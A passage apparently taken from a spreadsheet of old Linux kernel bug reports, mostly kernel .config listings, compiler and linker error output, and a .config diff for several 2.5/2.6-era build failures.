Video Broadcasting Devices # # CONFIG_DVB is not set CONFIG_VIDEO_VIDEOBUF=m CONFIG_VIDEO_TUNER=m CONFIG_VIDEO_BUF=m CONFIG_VIDEO_BTCX=m # # File systems # CONFIG_EXT2_FS=y # CONFIG_EXT2_FS_XATTR is not set CONFIG_EXT3_FS=y CONFIG_EXT3_FS_XATTR=y # CONFIG_EXT3_FS_POSIX_ACL is not set # CONFIG_EXT3_FS_SECURITY is not set CONFIG_JBD=y CONFIG_JBD_DEBUG=y CONFIG_FS_MBCACHE=y # CONFIG_REISERFS_FS is not set # CONFIG_JFS_FS is not set # CONFIG_XFS_FS is not set # CONFIG_MINIX_FS is not set # CONFIG_ROMFS_FS is not set # CONFIG_QUOTA is not set # CONFIG_AUTOFS_FS is not set CONFIG_AUTOFS4_FS=y # # CD-ROM/DVD Filesystems # CONFIG_ISO9660_FS=m CONFIG_JOLIET=y # CONFIG_ZISOFS is not set # CONFIG_UDF_FS is not set # # DOS/FAT/NT Filesystems # CONFIG_FAT_FS=m # CONFIG_MSDOS_FS is not set CONFIG_VFAT_FS=m # CONFIG_NTFS_FS is not set # # Pseudo filesystems # CONFIG_PROC_FS=y # CONFIG_DEVFS_FS is not set # CONFIG_TMPFS is not set CONFIG_RAMFS=y # # Miscellaneous filesystems # # CONFIG_ADFS_FS is not set # CONFIG_AFFS_FS is not set # CONFIG_HFS_FS is not set # CONFIG_BEFS_FS is not set # CONFIG_BFS_FS is not set # CONFIG_EFS_FS is not set CONFIG_CRAMFS=y # CONFIG_VXFS_FS is not set # CONFIG_HPFS_FS is not set # CONFIG_QNX4FS_FS is not set # CONFIG_SYSV_FS is not set # CONFIG_UFS_FS is not set # # Network File Systems # # CONFIG_NFS_FS is not set # CONFIG_NFSD is not set # CONFIG_EXPORTFS is not set # CONFIG_SMB_FS is not set # CONFIG_CIFS is not set # CONFIG_NCP_FS is not set # CONFIG_CODA_FS is not set # CONFIG_INTERMEZZO_FS is not set # CONFIG_AFS_FS is not set # # Partition Types # # CONFIG_PARTITION_ADVANCED is not set CONFIG_MSDOS_PARTITION=y CONFIG_NLS=y # # Native Language Support # CONFIG_NLS_DEFAULT="iso8859-1" # CONFIG_NLS_CODEPAGE_437 is not set # CONFIG_NLS_CODEPAGE_737 is not set # CONFIG_NLS_CODEPAGE_775 is not set CONFIG_NLS_CODEPAGE_850=m # CONFIG_NLS_CODEPAGE_852 is not set # CONFIG_NLS_CODEPAGE_855 is not set # CONFIG_NLS_CODEPAGE_857 is not set # CONFIG_NLS_CODEPAGE_860 is not set # CONFIG_NLS_CODEPAGE_861 is not set # CONFIG_NLS_CODEPAGE_862 is not set # CONFIG_NLS_CODEPAGE_863 is not set # CONFIG_NLS_CODEPAGE_864 is not set # CONFIG_NLS_CODEPAGE_865 is not set # CONFIG_NLS_CODEPAGE_866 is not set # CONFIG_NLS_CODEPAGE_869 is not set # CONFIG_NLS_CODEPAGE_936 is not set # CONFIG_NLS_CODEPAGE_950 is not set # CONFIG_NLS_CODEPAGE_932 is not set # CONFIG_NLS_CODEPAGE_949 is not set # CONFIG_NLS_CODEPAGE_874 is not set # CONFIG_NLS_ISO8859_8 is not set # CONFIG_NLS_CODEPAGE_1250 is not set # CONFIG_NLS_CODEPAGE_1251 is not set # CONFIG_NLS_ISO8859_1 is not set # CONFIG_NLS_ISO8859_2 is not set # CONFIG_NLS_ISO8859_3 is not set # CONFIG_NLS_ISO8859_4 is not set # CONFIG_NLS_ISO8859_5 is not set # CONFIG_NLS_ISO8859_6 is not set # CONFIG_NLS_ISO8859_7 is not set # CONFIG_NLS_ISO8859_9 is not set # CONFIG_NLS_ISO8859_13 is not set # CONFIG_NLS_ISO8859_14 is not set CONFIG_NLS_ISO8859_15=m # CONFIG_NLS_KOI8_R is not set # CONFIG_NLS_KOI8_U is not set # CONFIG_NLS_UTF8 is not set # # Graphics support # # CONFIG_FB is not set # CONFIG_VIDEO_SELECT is not set # # Console display driver support # CONFIG_VGA_CONSOLE=y # CONFIG_MDA_CONSOLE is not set CONFIG_DUMMY_CONSOLE=y # # Sound # CONFIG_SOUND=y # # Advanced Linux Sound Architecture # CONFIG_SND=m CONFIG_SND_SEQUENCER=m CONFIG_SND_SEQ_DUMMY=m CONFIG_SND_OSSEMUL=y CONFIG_SND_MIXER_OSS=m CONFIG_SND_PCM_OSS=m # CONFIG_SND_SEQUENCER_OSS is not set CONFIG_SND_RTCTIMER=m # CONFIG_SND_VERBOSE_PRINTK is not set # CONFIG_SND_DEBUG is not set # # Generic devices # # CONFIG_SND_DUMMY is not set # CONFIG_SND_VIRMIDI is not set # CONFIG_SND_MTPAV is not set # CONFIG_SND_SERIAL_U16550 is not set # CONFIG_SND_MPU401 is not set # # PCI devices # # CONFIG_SND_ALI5451 is not set # CONFIG_SND_AZT3328 is not set # CONFIG_SND_CS46XX is not set # CONFIG_SND_CS4281 is not set # CONFIG_SND_EMU10K1 is not set # CONFIG_SND_KORG1212 is not set # CONFIG_SND_NM256 is not set # CONFIG_SND_RME32 is not set # CONFIG_SND_RME96 is not set # CONFIG_SND_RME9652 is not set # CONFIG_SND_HDSP is not set # CONFIG_SND_TRIDENT is not set # CONFIG_SND_YMFPCI is not set # CONFIG_SND_ALS4000 is not set # CONFIG_SND_CMIPCI is not set # CONFIG_SND_ENS1370 is not set CONFIG_SND_ENS1371=m # CONFIG_SND_ES1938 is not set # CONFIG_SND_ES1968 is not set # CONFIG_SND_MAESTRO3 is not set # CONFIG_SND_FM801 is not set # CONFIG_SND_ICE1712 is not set # CONFIG_SND_ICE1724 is not set # CONFIG_SND_INTEL8X0 is not set # CONFIG_SND_SONICVIBES is not set # CONFIG_SND_VIA82XX is not set # CONFIG_SND_VX222 is not set # # Open Sound System # CONFIG_SOUND_PRIME=m CONFIG_SOUND_BT878=m # CONFIG_SOUND_CMPCI is not set # CONFIG_SOUND_EMU10K1 is not set # CONFIG_SOUND_FUSION is not set # CONFIG_SOUND_CS4281 is not set # CONFIG_SOUND_ES1370 is not set CONFIG_SOUND_ES1371=m # CONFIG_SOUND_ESSSOLO1 is not set # CONFIG_SOUND_MAESTRO is not set # CONFIG_SOUND_MAESTRO3 is not set # CONFIG_SOUND_ICH is not set # CONFIG_SOUND_RME96XX is not set # CONFIG_SOUND_SONICVIBES is not set # CONFIG_SOUND_TRIDENT is not set # CONFIG_SOUND_MSNDCLAS is not set # CONFIG_SOUND_MSNDPIN is not set # CONFIG_SOUND_VIA82CXXX is not set # CONFIG_SOUND_OSS is not set # CONFIG_SOUND_TVMIXER is not set # CONFIG_SOUND_ALI5455 is not set # CONFIG_SOUND_FORTE is not set # CONFIG_SOUND_AD1980 is not set # # USB support # # CONFIG_USB is not set # CONFIG_USB_GADGET is not set # # Bluetooth support # # CONFIG_BT is not set # # Profiling support # # CONFIG_PROFILING is not set # # Kernel hacking # CONFIG_DEBUG_KERNEL=y # CONFIG_DEBUG_STACKOVERFLOW is not set # CONFIG_DEBUG_SLAB is not set # CONFIG_DEBUG_IOVIRT is not set CONFIG_MAGIC_SYSRQ=y # CONFIG_DEBUG_SPINLOCK is not set # CONFIG_DEBUG_PAGEALLOC is not set # CONFIG_DEBUG_INFO is not set # CONFIG_DEBUG_SPINLOCK_SLEEP is not set # CONFIG_FRAME_POINTER is not set # # Security options # # CONFIG_SECURITY is not set # # Cryptographic options # # CONFIG_CRYPTO is not set # # Library routines # # CONFIG_CRC32 is not set CONFIG_ZLIB_INFLATE=y CONFIG_X86_BIOS_REBOOT=y Just make. PS: This is my first bug report. Sorry for any mistake.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>first at all, it's my first bug report so don't insult me if i report wrong or anything else, i just try to help... Exact Kernel version: 2.5.52 Distribution: GNU/Linux Debian 'Sid' Hardware Environment: HP Pavilion model: 7957 Software Environment: i just use official software and official 'deb's Problem Description: when i tried to compile the kernel i get this error: gcc -Wp,-MD,drivers/net/.defxx.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=i686 -malign-functions=4 -Iarch/i386/mach-generic -fomit-frame-pointer -nostdinc -iwithprefix include -DKBUILD_BASENAME=defxx -DKBUILD_MODNAME=defxx -c -o drivers/net/defxx.o drivers/net/defxx.c drivers/net/defxx.c:202: #error Please convert me to Documentation/DMA-mapping.txt In file included from drivers/net/defxx.c:224: drivers/net/defxx.h:1677: warning: `ALIGN' redefined include/linux/cache.h:7: warning: this is the location of the previous definition make[3]: *** [drivers/net/defxx.o] Error 1 make[2]: *** [drivers/net] Error 2 make[1]: *** [drivers] Error 2 make[1]: Leaving directory `/usr/src/kernel-source-2.5.52' make: *** [stamp-build] Error 2 Steps to reproduce: my Networking options and Network device support of mi .config # # Networking options # CONFIG_PACKET=y # CONFIG_PACKET_MMAP is not set CONFIG_NETLINK_DEV=y CONFIG_NETFILTER=y # CONFIG_NETFILTER_DEBUG is not set CONFIG_FILTER=y CONFIG_UNIX=y # CONFIG_NET_KEY is not set CONFIG_INET=y CONFIG_IP_MULTICAST=y # CONFIG_IP_ADVANCED_ROUTER is not set # CONFIG_IP_PNP is not set CONFIG_NET_IPIP=m CONFIG_NET_IPGRE=m # CONFIG_NET_IPGRE_BROADCAST is not set # CONFIG_IP_MROUTE is not set # CONFIG_ARPD is not set CONFIG_INET_ECN=y CONFIG_SYN_COOKIES=y # CONFIG_INET_AH is not set # CONFIG_INET_ESP is not set # CONFIG_XFRM_USER is not set # # IP: Netfilter Configuration # CONFIG_IP_NF_CONNTRACK=m CONFIG_IP_NF_FTP=m CONFIG_IP_NF_IRC=m CONFIG_IP_NF_QUEUE=m CONFIG_IP_NF_IPTABLES=m CONFIG_IP_NF_MATCH_LIMIT=m CONFIG_IP_NF_MATCH_MAC=m # CONFIG_IP_NF_MATCH_PKTTYPE is not set CONFIG_IP_NF_MATCH_MARK=m CONFIG_IP_NF_MATCH_MULTIPORT=m CONFIG_IP_NF_MATCH_TOS=m # CONFIG_IP_NF_MATCH_ECN is not set # CONFIG_IP_NF_MATCH_DSCP is not set # CONFIG_IP_NF_MATCH_AH_ESP is not set CONFIG_IP_NF_MATCH_LENGTH=m CONFIG_IP_NF_MATCH_TTL=m CONFIG_IP_NF_MATCH_TCPMSS=m # CONFIG_IP_NF_MATCH_HELPER is not set CONFIG_IP_NF_MATCH_STATE=m # CONFIG_IP_NF_MATCH_CONNTRACK is not set CONFIG_IP_NF_MATCH_UNCLEAN=m CONFIG_IP_NF_MATCH_OWNER=m CONFIG_IP_NF_FILTER=m CONFIG_IP_NF_TARGET_REJECT=m CONFIG_IP_NF_TARGET_MIRROR=m CONFIG_IP_NF_NAT=m CONFIG_IP_NF_NAT_NEEDED=y CONFIG_IP_NF_TARGET_MASQUERADE=m CONFIG_IP_NF_TARGET_REDIRECT=m # CONFIG_IP_NF_NAT_LOCAL is not set CONFIG_IP_NF_NAT_SNMP_BASIC=m CONFIG_IP_NF_NAT_IRC=m CONFIG_IP_NF_NAT_FTP=m CONFIG_IP_NF_MANGLE=m CONFIG_IP_NF_TARGET_TOS=m # CONFIG_IP_NF_TARGET_ECN is not set # CONFIG_IP_NF_TARGET_DSCP is not set CONFIG_IP_NF_TARGET_MARK=m CONFIG_IP_NF_TARGET_LOG=m # CONFIG_IP_NF_TARGET_ULOG is not set CONFIG_IP_NF_TARGET_TCPMSS=m # CONFIG_IP_NF_ARPTABLES is not set CONFIG_IP_NF_COMPAT_IPCHAINS=m # CONFIG_IP_NF_COMPAT_IPFWADM is not set # CONFIG_IPV6 is not set # # SCTP Configuration (EXPERIMENTAL) # CONFIG_IPV6_SCTP__=y # CONFIG_IP_SCTP is not set # CONFIG_ATM is not set # CONFIG_VLAN_8021Q is not set # CONFIG_LLC is not set # CONFIG_DECNET is not set # CONFIG_BRIDGE is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_NET_DIVERT is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set # CONFIG_NET_FASTROUTE is not set # CONFIG_NET_HW_FLOWCONTROL is not set # # QoS and/or fair queueing # # CONFIG_NET_SCHED is not set # # Network testing # # CONFIG_NET_PKTGEN is not set # # Network device support # CONFIG_NETDEVICES=y # # ARCnet devices # # CONFIG_ARCNET is not set CONFIG_DUMMY=m CONFIG_BONDING=m CONFIG_EQUALIZER=m CONFIG_TUN=m # CONFIG_ETHERTAP is not set # # Ethernet (10 or 100Mbit) # CONFIG_NET_ETHERNET=y # CONFIG_HAPPYMEAL is not set # CONFIG_SUNGEM is not set # CONFIG_NET_VENDOR_3COM is not set # CONFIG_NET_VENDOR_SMC is not set # CONFIG_NET_VENDOR_RACAL is not set # # Tulip family network device support # # CONFIG_NET_TULIP is not set # CONFIG_HP100 is not set CONFIG_NET_PCI=y # CONFIG_PCNET32 is not set # CONFIG_ADAPTEC_STARFIRE is not set # CONFIG_B44 is not set # CONFIG_DGRS is not set # CONFIG_EEPRO100 is not set # CONFIG_E100 is not set # CONFIG_FEALNX is not set # CONFIG_NATSEMI is not set # CONFIG_NE2K_PCI is not set # CONFIG_8139CP is not set CONFIG_8139TOO=y # CONFIG_8139TOO_PIO is not set # CONFIG_8139TOO_TUNE_TWISTER is not set # CONFIG_8139TOO_8129 is not set # CONFIG_8139_OLD_RX_RESET is not set # CONFIG_SIS900 is not set # CONFIG_EPIC100 is not set # CONFIG_SUNDANCE is not set # CONFIG_TLAN is not set # CONFIG_VIA_RHINE is not set # CONFIG_NET_POCKET is not set # # Ethernet (1000 Mbit) # # CONFIG_ACENIC is not set # CONFIG_DL2K is not set # CONFIG_E1000 is not set # CONFIG_NS83820 is not set # CONFIG_HAMACHI is not set # CONFIG_YELLOWFIN is not set # CONFIG_R8169 is not set # CONFIG_SK98LIN is not set # CONFIG_TIGON3 is not set CONFIG_FDDI=y CONFIG_DEFXX=y # CONFIG_SKFP is not set CONFIG_HIPPI=y CONFIG_ROADRUNNER=m # CONFIG_ROADRUNNER_LARGE_RINGS is not set CONFIG_PLIP=m CONFIG_PPP=m CONFIG_PPP_MULTILINK=y CONFIG_PPP_FILTER=y CONFIG_PPP_ASYNC=m CONFIG_PPP_SYNC_TTY=m CONFIG_PPP_DEFLATE=m CONFIG_PPP_BSDCOMP=m # CONFIG_PPPOE is not set # CONFIG_SLIP is not set # # Wireless LAN (non-hamradio) # # CONFIG_NET_RADIO is not set # # Token Ring devices (depends on LLC=y) # CONFIG_NET_FC=y # CONFIG_IPHASE5526 is not set # CONFIG_RCPCI is not set # CONFIG_SHAPER is not set # # Wan interfaces # # CONFIG_WAN is not set</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4 Problem Description: (copied from http://www.lkml.org/archive/2003/5/9/167/index.html) ld -m elf_i386 -T arch/i386/vmlinux.lds.s arch/i386/kernel/head.o arch/i386/kernel/init_task.o init/built-in.o --start-group usr/built-in.o arch/i386/kernel/built-in.o arch/i386/mm/built-in.o arch/i386/mach-default/built-in.o kernel/built-in.o mm/built-in.o fs/built-in.o ipc/built-in.o security/built-in.o crypto/built-in.o lib/lib.a arch/i386/lib/lib.a drivers/built-in.o sound/built-in.o arch/i386/pci/built-in.o net/built-in.o --end-group -o vmlinux drivers/built-in.o(.altinstructions+0x84c): undefined reference to `local symbols in discarded section .exit.text' drivers/built-in.o(.altinstructions+0x858): undefined reference to `local symbols in discarded section .exit.text' make: *** [vmlinux] Error 1 There are two problems visible with this: 1) Macros using alternative*() break when called from a discarded section (probably some driver compiled in the kernel that can also be compiled as a module and thus has an exit routine which was discarded) 2) I'm not using a CONFIG_X86_GENERIC kernel, so it has no need for dynamic patching (it already knows the CPU type with enough level of detail, since I told it). Steps to reproduce: make bzImage modules modules_install with the .config file I will attach (it's also in the message to lkml)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Distribution: Slackware 9.1 Hardware Environment: P4, 256MB RAM, IDE hdd Software Environment: shell Problem Description: After copnfiguring the kernel 'make bzImage' fails. At the end of the report I include the full output. Steps to reproduce: make bzImage root@bgsaxe:/usr/src/linux# make bzImage CHK include/linux/version.h UPD include/linux/version.h SYMLINK include/asm -&gt; include/asm-i386 HOSTCC scripts/basic/fixdep HOSTCC scripts/basic/split-include HOSTCC scripts/basic/docproc SHIPPED scripts/kconfig/zconf.tab.h HOSTCC scripts/kconfig/conf.o HOSTCC scripts/kconfig/mconf.o SHIPPED scripts/kconfig/zconf.tab.c SHIPPED scripts/kconfig/lex.zconf.c HOSTCC -fPIC scripts/kconfig/zconf.tab.o HOSTLLD -shared scripts/kconfig/libkconfig.so HOSTLD scripts/kconfig/conf scripts/kconfig/conf -s arch/i386/Kconfig # # using defaults found in .config # SPLIT include/linux/autoconf.h -&gt; include/config/* HOSTCC scripts/genksyms/genksyms.o SHIPPED scripts/genksyms/lex.c SHIPPED scripts/genksyms/parse.h SHIPPED scripts/genksyms/keywords.c HOSTCC scripts/genksyms/lex.o SHIPPED scripts/genksyms/parse.c HOSTCC scripts/genksyms/parse.o HOSTLD scripts/genksyms/genksyms HOSTCC scripts/conmakehash HOSTCC scripts/kallsyms CC scripts/empty.o HOSTCC scripts/mk_elfconfig MKELF scripts/elfconfig.h HOSTCC scripts/file2alias.o HOSTCC scripts/modpost.o HOSTCC scripts/sumversion.o HOSTLD scripts/modpost HOSTCC scripts/pnmtologo HOSTCC scripts/bin2c CC arch/i386/kernel/asm-offsets.s In file included from include/linux/capability.h:16, from include/linux/binfmts.h:5, from include/linux/sched.h:9, from arch/i386/kernel/asm-offsets.c:7: include/linux/types.h:21: syntax error before "dev_t" include/linux/types.h:21: warning: type defaults to `int' in declaration of `dev_t' include/linux/types.h:21: warning: data definition has no type or storage class In file included from include/linux/kernel.h:15, from include/linux/wait.h:13, from include/linux/fs.h:12, from include/linux/capability.h:17, from include/linux/binfmts.h:5, from include/linux/sched.h:9, from arch/i386/kernel/asm-offsets.c:7: include/asm/byteorder.h:14: syntax error before "__u32" include/asm/byteorder.h:28: syntax error before "__u64" In file included from include/asm/math_emu.h:4, from include/asm/processor.h:11, from include/linux/prefetch.h:13, from include/linux/list.h:6, from include/linux/wait.h:14, from include/linux/fs.h:12, from include/linux/capability.h:17, from include/linux/binfmts.h:5, from include/linux/sched.h:9, from arch/i386/kernel/asm-offsets.c:7: include/asm/sigcontext.h:79: warning: no semicolon at end of struct or union include/asm/sigcontext.h:79: syntax error before '*' token include/asm/sigcontext.h:82: syntax error before '}' token In file included from include/asm/processor.h:11, from include/linux/prefetch.h:13, from include/linux/list.h:6, from include/linux/wait.h:14, from include/linux/fs.h:12, from include/linux/capability.h:17, from include/linux/binfmts.h:5, from include/linux/sched.h:9, from arch/i386/kernel/asm-offsets.c:7: include/asm/math_emu.h:6: syntax error before '*' token include/asm/math_emu.h:6: warning: function declaration isn't a prototype include/asm/math_emu.h:7: syntax error before '*' token include/asm/math_emu.h:7: warning: function declaration isn't a prototype In file included from include/linux/prefetch.h:13, from include/linux/list.h:6, from include/linux/wait.h:14, from include/linux/fs.h:12, from include/linux/capability.h:17, from include/linux/binfmts.h:5, from include/linux/sched.h:9, from arch/i386/kernel/asm-offsets.c:7: include/asm/processor.h:422: warning: no semicolon at end of struct or union include/asm/processor.h:422: syntax error before '*' token include/asm/processor.h:428: syntax error before '}' token include/asm/processor.h: In function `load_esp0': include/asm/processor.h:454: dereferencing pointer to incomplete type include/asm/processor.h:456: dereferencing pointer to incomplete type include/asm/processor.h:457: dereferencing pointer to incomplete type include/asm/processor.h:458: dereferencing pointer to incomplete type In file included from include/linux/fs.h:19, from include/linux/capability.h:17, from include/linux/binfmts.h:5, from include/linux/sched.h:9, from arch/i386/kernel/asm-offsets.c:7: include/linux/dcache.h: In function `d_drop': include/linux/dcache.h:149: warning: implicit declaration of function `spin_lock' include/linux/dcache.h:152: warning: implicit declaration of function `spin_unlock' In file included from include/linux/fs.h:200, from include/linux/capability.h:17, from include/linux/binfmts.h:5, from include/linux/sched.h:9, from arch/i386/kernel/asm-offsets.c:7: include/asm/semaphore.h: In function `down': include/asm/semaphore.h:119: warning: implicit declaration of function `might_sleep' In file included from include/linux/capability.h:17, from include/linux/binfmts.h:5, from include/linux/sched.h:9, from arch/i386/kernel/asm-offsets.c:7: include/linux/fs.h: At top level: include/linux/fs.h:424: syntax error before "dev_t" include/linux/fs.h:424: warning: no semicolon at end of struct or union include/linux/fs.h:427: syntax error before '}' token include/linux/fs.h:433: syntax error before "dev_t" include/linux/fs.h:433: warning: no semicolon at end of struct or union include/linux/fs.h:438: syntax error before '}' token In file included from include/linux/reiserfs_fs_sb.h:8, from include/linux/fs.h:729, from include/linux/capability.h:17, from include/linux/binfmts.h:5, from include/linux/sched.h:9, from arch/i386/kernel/asm-offsets.c:7: include/linux/tqueue.h: In function `queue_task': include/linux/tqueue.h:107: warning: implicit declaration of function `typecheck' include/linux/tqueue.h:107: syntax error before "unsigned" In file included from include/linux/capability.h:17, from include/linux/binfmts.h:5, from include/linux/sched.h:9, from arch/i386/kernel/asm-offsets.c:7: include/linux/fs.h: At top level: include/linux/fs.h:818: syntax error before "dev_t" include/linux/fs.h:818: warning: function declaration isn't a prototype include/linux/fs.h:1109: warning: parameter names (without types) in function declaration include/linux/fs.h:1113: warning: parameter names (without types) in function declaration In file included from include/linux/cpumask.h:5, from include/asm/smp.h:11, from include/linux/smp.h:14, from include/linux/sched.h:23, from arch/i386/kernel/asm-offsets.c:7: include/linux/bitmap.h:46: syntax error before '*' token include/linux/bitmap.h:47: warning: function declaration isn't a prototype In file included from include/asm/siginfo.h:4, from include/linux/signal.h:5, from include/linux/sched.h:26, from arch/i386/kernel/asm-offsets.c:7: include/asm-generic/siginfo.h:56: syntax error before "timer_t" include/asm-generic/siginfo.h:56: warning: no semicolon at end of struct or union include/asm-generic/siginfo.h:56: warning: no semicolon at end of struct or union include/asm-generic/siginfo.h:92: syntax error before '}' token include/asm-generic/siginfo.h:92: warning: type defaults to `int' in declaration of `_sifields' include/asm-generic/siginfo.h:92: warning: data definition has no type or storage class include/asm-generic/siginfo.h:93: syntax error before '}' token include/asm-generic/siginfo.h:93: warning: type defaults to `int' in declaration of `siginfo_t' include/asm-generic/siginfo.h:93: warning: data definition has no type or storage class include/asm-generic/siginfo.h: In function `copy_siginfo': include/asm-generic/siginfo.h:283: structure has no member named `_sifields' include/asm-generic/siginfo.h:283: structure has no member named `_sifields' include/asm-generic/siginfo.h:283: structure has no member named `_sifields' include/asm-generic/siginfo.h: At top level: include/asm-generic/siginfo.h:288: syntax error before '*' token include/asm-generic/siginfo.h:288: warning: function declaration isn't a prototype In file included from include/linux/sched.h:26, from arch/i386/kernel/asm-offsets.c:7: include/linux/signal.h:14: syntax error before "siginfo_t" include/linux/signal.h:14: warning: no semicolon at end of struct or union In file included from include/linux/sched.h:28, from arch/i386/kernel/asm-offsets.c:7: include/linux/fs_struct.h: In function `set_fs_root': include/linux/fs_struct.h:34: warning: implicit declaration of function `write_lock' include/linux/fs_struct.h:39: warning: implicit declaration of function `write_unlock' In file included from arch/i386/kernel/asm-offsets.c:7: include/linux/sched.h: At top level: include/linux/sched.h:374: `NGROUPS' undeclared here (not in a function) include/linux/sched.h:390: field `thread' has incomplete type include/linux/sched.h:538: confused by earlier errors, bailing out make[1]: *** [arch/i386/kernel/asm-offsets.s] Error 1 make: *** [arch/i386/kernel/asm-offsets.s] Error 2</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Failure on compilation: include/asm/bitops.h:122: error: inconsistent operand constraints in an `asm' in nfs_access_add_cache()</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Fedora Core 7 Hardware Environment: AMD PC Software Environment: Problem Description: CC arch/x86/kernel/apm_32.o arch/x86/kernel/apm_32.c: In function ‘suspend’: arch/x86/kernel/apm_32.c:1192: warning: ‘pm_send_all’ is deprecated (declared at include/linux/pm_legacy.h:16) arch/x86/kernel/apm_32.c:1227: warning: ‘pm_send_all’ is deprecated (declared at include/linux/pm_legacy.h:16) arch/x86/kernel/apm_32.c: In function ‘check_events’: arch/x86/kernel/apm_32.c:1340: warning: ‘pm_send_all’ is deprecated (declared at include/linux/pm_legacy.h:16) CC arch/x86/kernel/mpparse_32.o CC arch/x86/kernel/apic_32.o And this one: CC [M] arch/x86/kernel/test_nx.o {standard input}: Assembler messages: {standard input}:93: Error: can not do 8 byte relocation {standard input}:94: Error: can not do 8 byte relocation make[1]: *** [arch/x86/kernel/test_nx.o] Error 1 make: *** [arch/x86/kernel] Error 2 INSTALL arch/x86/kernel/cpu/cpufreq/acpi-cpufreq.ko Steps to reproduce: Compile with the following .config: (please email me ....can send attachment). Or essentially this: /mnt/hd0/download/linux-2.6_working&gt;cat /tmp/oo --- /tmp/.config 2008-01-31 07:49:18.000000000 +0800 +++ ./.config 2008-01-31 07:49:36.000000000 +0800 @@ -1,12 +1,13 @@ # # Automatically generated make config: don't edit # Linux kernel version: 2.6.24 -# Wed Jan 30 18:08:33 2008 +# Thu Jan 31 07:49:36 2008 # # CONFIG_64BIT is not set CONFIG_X86_32=y # CONFIG_X86_64 is not set CONFIG_X86=y +# CONFIG_GENERIC_LOCKBREAK is not set CONFIG_GENERIC_TIME=y CONFIG_GENERIC_CMOS_UPDATE=y CONFIG_CLOCKSOURCE_WATCHDOG=y @@ -22,6 +23,7 @@ CONFIG_GENERIC_ISA_DMA=y CONFIG_GENERIC_IOMAP=y CONFIG_GENERIC_BUG=y CONFIG_GENERIC_HWEIGHT=y +# CONFIG_GENERIC_GPIO is not set CONFIG_ARCH_MAY_HAVE_PC_FDC=y CONFIG_DMI=y # CONFIG_RWSEM_GENERIC_SPINLOCK is not set @@ -30,6 +32,7 @@ CONFIG_RWSEM_XCHGADD_ALGORITHM=y # CONFIG_ARCH_HAS_ILOG2_U64 is not set CONFIG_GENERIC_CALIBRATE_DELAY=y # CONFIG_GENERIC_TIME_VSYSCALL is not set +# CONFIG_HAVE_SETUP_PER_CPU_AREA is not set CONFIG_ARCH_SUPPORTS_OPROFILE=y # CONFIG_ZONE_DMA32 is not set CONFIG_ARCH_POPULATES_NODE_MAP=y @@ -38,6 +41,7 @@ CONFIG_GENERIC_HARDIRQS=y CONFIG_GENERIC_IRQ_PROBE=y CONFIG_GENERIC_PENDING_IRQ=y CONFIG_X86_SMP=y +CONFIG_X86_32_SMP=y CONFIG_X86_HT=y CONFIG_X86_BIOS_REBOOT=y CONFIG_X86_TRAMPOLINE=y @@ -151,6 +155,7 @@ CONFIG_SMP=y # CONFIG_X86_VISWS is not set CONFIG_X86_GENERICARCH=y # CONFIG_X86_ES7000 is not set +# CONFIG_X86_RDC321X is not set # CONFIG_X86_VSMP is not set CONFIG_SCHED_NO_NO_OMIT_FRAME_POINTER=y # CONFIG_PARAVIRT_GUEST is not set @@ -196,6 +201,7 @@ CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_X86_TSC=y CONFIG_X86_CMOV=y CONFIG_X86_MINIMUM_CPU_FAMILY=4 +CONFIG_X86_DEBUGCTLMSR=y CONFIG_HPET_TIMER=y CONFIG_HPET_EMULATE_RTC=y CONFIG_NR_CPUS=32 @@ -242,7 +248,6 @@ CONFIG_HIGHPTE=y CONFIG_MTRR=y CONFIG_EFI=y # CONFIG_IRQBALANCE is not set -CONFIG_BOOT_IOREMAP=y CONFIG_SECCOMP=y # CONFIG_HZ_100 is not set # CONFIG_HZ_250 is not set @@ -300,6 +305,7 @@ CONFIG_ACPI_SYSTEM=y CONFIG_X86_PM_TIMER=y CONFIG_ACPI_CONTAINER=y CONFIG_ACPI_SBS=m +CONFIG_X86_APM_BOOT=y CONFIG_APM=y # CONFIG_APM_IGNORE_USER_SUSPEND is not set # CONFIG_APM_DO_ENABLE is not set @@ -1558,6 +1564,7 @@ CONFIG_E1000=m CONFIG_E1000_NAPI=y # CONFIG_E1000_DISABLE_PACKET_SPLIT is not set CONFIG_E1000E=m +CONFIG_E1000E_ENABLED=y # CONFIG_IP1000 is not set # CONFIG_IGB is not set CONFIG_NS83820=m @@ -3266,11 +3273,6 @@ CONFIG_KS0108_PORT=0x378 CONFIG_KS0108_DELAY=2 CONFIG_CFAG12864B=m CONFIG_CFAG12864B_RATE=20 -CONFIG_VIRTUALIZATION=y -CONFIG_KVM=m -CONFIG_KVM_INTEL=m -CONFIG_KVM_AMD=m -CONFIG_LGUEST=m # # Userspace I/O @@ -3562,9 +3564,12 @@ CONFIG_DEBUG_LIST=y # CONFIG_FORCED_INLINING is not set # CONFIG_BOOT_PRINTK_DELAY is not set # CONFIG_RCU_TORTURE_TEST is not set +CONFIG_KPROBES_SANITY_TEST=y +CONFIG_BACKTRACE_SELF_TEST=y # CONFIG_LKDTM is not set # CONFIG_FAULT_INJECTION is not set # CONFIG_LATENCYTOP is not set +CONFIG_PROVIDE_OHCI1394_DMA_INIT=y # CONFIG_SAMPLES is not set CONFIG_EARLY_PRINTK=y # CONFIG_DEBUG_STACKOVERFLOW is not set @@ -3573,11 +3578,25 @@ CONFIG_EARLY_PRINTK=y # # Page alloc debug is incompatible with Software Suspend on i386 # +CONFIG_DEBUG_PAGEALLOC=y CONFIG_DEBUG_RODATA=y +CONFIG_DEBUG_RODATA_TEST=y +CONFIG_DEBUG_NX_TEST=m CONFIG_4KSTACKS=y CONFIG_X86_FIND_SMP_CONFIG=y CONFIG_X86_MPPARSE=y CONFIG_DOUBLEFAULT=y +CONFIG_IO_DELAY_TYPE_0X80=0 +CONFIG_IO_DELAY_TYPE_0XED=1 